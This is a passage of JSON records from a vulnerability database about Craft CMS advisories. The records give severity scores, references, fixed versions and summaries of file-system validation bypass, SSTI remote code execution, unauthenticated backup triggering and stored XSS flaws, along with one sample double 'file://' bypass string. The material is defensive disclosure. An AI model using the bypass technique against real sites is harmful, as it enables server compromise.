all production hardening settings (allowAdminChanges: false, devMode: false,\nenableTwigSandbox: true).\n\nUsers should update to the patched 5.99 release to mitigate the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31857","reference_id":"","reference_type":"","scores":[{"value":"0.00138","scoring_system":"epss","scoring_elements":"0.33515","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31857"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/8d4903647dcfd31b8d40ed027e27082013347a80","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-12T14:02:18Z/"}],"url":"https://github.com/craftcms/cms/commit/8d4903647dcfd31b8d40ed027e27082013347a80"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31857","reference_id":"CVE-2026-31857","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31857"},{"reference_url":"https://github.com/advisories/GHSA-fp5j-j7j4-mcxc","reference_id":"GHSA-fp5j-j7j4-mcxc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fp5j-j7j4-mcxc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc","reference_id":"GHSA-fp5j-j7j4-mcxc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-12T14:02:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74806?format=json","purl":"pkg:composer/craftcms/cms@5.9.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.9"}],"aliases":["CVE-2026-31857","GHSA-fp5j-j7j4-mcxc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4wkr-jx1w-77hn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56185?format=json","vulnerability_id":"VCID-5cxe-tjpb-3qan","summary":"Local File System Validation Bypass Leading to File Overwrite, Sensitive File Access, and Potential Code Execution\nA vulnerability in CraftCMS allows an attacker to bypass local file system validation by utilizing a double `file://` scheme (e.g., `file://file:////`). This enables the attacker to specify sensitive folders as the file system, leading to potential file overwriting through malicious uploads, unauthorized access to sensitive files, and, under certain conditions, remote code execution (RCE) via Server-Side Template Injection (SSTI) payloads.\n\nNote that this will only work if you have an authenticated administrator account with allowAdminChanges enabled","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52291","reference_id":"","reference_type":"","scores":[{"value":"0.00128","scoring_system":"epss","scoring_elements":"0.31722","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52291"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52291","reference_id":"CVE-2024-52291","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52291"},{"reference_url":"https://github.com/advisories/GHSA-jrh5-vhr9-qh7q","reference_id":"GHSA-jrh5-vhr9-qh7q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jrh5-vhr9-qh7q"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-jrh5-vhr9-qh7q","reference_id":"GHSA-jrh5-vhr9-qh7q","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-11-13T18:50:50Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-jrh5-vhr9-qh7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83249?format=json","purl":"pkg:composer/craftcms/cms@5.4.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-c2nk-y4rx-1qf4"},{"vulnerability":"VCID-chep-xthg-zuee"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.4.6"}],"aliases":["CVE-2024-52291","GHSA-jrh5-vhr9-qh7q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5cxe-tjpb-3qan"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49586?format=json","vulnerability_id":"VCID-5mnd-qvaq-k3am","summary":"Unauthenticated Craft CMS users can trigger a database backup\nUnauthenticated users can trigger database backup operations via specific admin actions, potentially leading to resource exhaustion or information disclosure.Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.Craft 3 users should update to the latest Craft 4 and 5 releases, which include the fixes.Resources:\n\nhttps://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68456","reference_id":"","reference_type":"","scores":[{"value":"0.00214","scoring_system":"epss","scoring_elements":"0.4399","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68456"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:26:08Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39","reference_id":"","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:26:08Z/"}],"url":"https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68456","reference_id":"CVE-2025-68456","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68456"},{"reference_url":"https://github.com/advisories/GHSA-v64r-7wg9-23pr","reference_id":"GHSA-v64r-7wg9-23pr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v64r-7wg9-23pr"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr","reference_id":"GHSA-v64r-7wg9-23pr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:26:08Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68456","GHSA-v64r-7wg9-23pr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5mnd-qvaq-k3am"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50362?format=json","vulnerability_id":"VCID-5q5g-jrxm-eyhe","summary":"Craft CMS has Stored XSS in Table Field in its \"Row Heading\" Column Type\nA stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `Row Heading` column type. The application fails to sanitize input within row headings, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.","references":[{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7b372de262b8d9d2ce859f32780c3715719b6f5a","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/7b372de262b8d9d2ce859f32780c3715719b6f5a"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.19","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.19"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.23","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.23"},{"reference_url":"https://github.com/advisories/GHSA-6j87-m5qx-9fqp","reference_id":"GHSA-6j87-m5qx-9fqp","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6j87-m5qx-9fqp"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-6j87-m5qx-9fqp","reference_id":"GHSA-6j87-m5qx-9fqp","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-6j87-m5qx-9fqp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["GHSA-6j87-m5qx-9fqp"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5q5g-jrxm-eyhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56181?format=json","vulnerability_id":"VCID-71sv-62m4-z3er","summary":"Craft CMS vulnerable to Potential Remote Code Execution via missing path normalization & Twig SSTI\nMissing `normalizePath` in the function `FileHelper::absolutePath` could lead to Remote Code Execution on the server via twig SSTI.\n\n`(Post-authentication, ALLOW_ADMIN_CHANGES=true)`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52293","reference_id":"","reference_type":"","scores":[{"value":"0.21994","scoring_system":"epss","scoring_elements":"0.95885","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52293"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-11-13T18:54:41Z/"}],"url":"https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52293","reference_id":"CVE-2024-52293","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52293"},{"reference_url":"https://github.com/advisories/GHSA-f3cw-hg6r-chfv","reference_id":"GHSA-f3cw-hg6r-chfv","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f3cw-hg6r-chfv"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv","reference_id":"GHSA-f3cw-hg6r-chfv","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-11-13T18:54:41Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83245?format=json","purl":"pkg:composer/craftcms/cms@5.4.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5cxe-tjpb-3qan"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-c2nk-y4rx-1qf4"},{"vulnerability":"VCID-chep-xthg-zuee"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-d